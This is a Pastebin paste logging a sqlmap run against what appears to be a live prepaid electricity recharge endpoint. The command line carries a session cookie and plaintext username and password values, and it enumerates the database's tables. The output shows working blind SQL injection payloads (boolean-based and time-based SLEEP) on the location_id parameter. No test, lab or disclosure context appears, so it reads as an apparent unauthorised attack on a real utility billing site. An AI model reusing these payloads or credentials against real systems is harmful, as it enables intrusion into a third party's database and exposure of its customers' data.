Guest User

sqlmap - electricity

a guest
Apr 25th, 2018
49
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
MySQL 1.60 KB | None | 0 0
  1. sqlmap -u "https://myxenius.com/Prepaid_couponController/processRecharge" --cookie="PHPSESSID=h3ngrk7d21c8otqo5qeik2rca2; _ga=GA1.2.1511335332.1524032661; _gid=GA1.2.510211868.1524686611; xe_username=6091151301; xe_password=6091151301" --data="coupon_id=609110004960&location_id=6091151301" -p location_id -D sdp --tables --threads=10
  2.         ___
  3.        __H__
  4.  ___ ___[,]_____ ___ ___  {1.1#stable}
  5. |_ -| . [(]     | .'| . |
  6. |___|_  [,]_|_|_|__,|  _|
  7.      |_|V          |_|   http://sqlmap.org
  8.  
  9. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  10.  
  11. [*] starting at 02:45:45
  12.  
  13. [02:45:45] [INFO] resuming back-end DBMS 'mysql'
  14. [02:45:45] [INFO] testing connection to the target URL
  15. [02:45:46] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS/IDS
  16. sqlmap resumed the following injection point(s) from stored session:
  17. ---
  18. Parameter: location_id (POST)
  19.     Type: boolean-based blind
  20.     Title: AND boolean-based blind - WHERE or HAVING clause
  21.     Payload: coupon_id=609110004960&location_id=6091151301' AND 5807=5807 AND 'YUTL'='YUTL
  22.  
  23.     Type: AND/OR time-based blind
  24.     Title: MySQL >= 5.0.12 AND time-based blind
  25.     Payload: coupon_id=609110004960&location_id=6091151301' AND SLEEP(5) AND 'gFTQ'='gFTQ
  26. ---
  27. [02:45:46] [INFO] the back-end DBMS is MySQL
  28. web application technology: PHP 5.6.32, Apache
  29. back-end DBMS: MySQL >= 5.0.12
Add Comment
Please, Sign In to add comment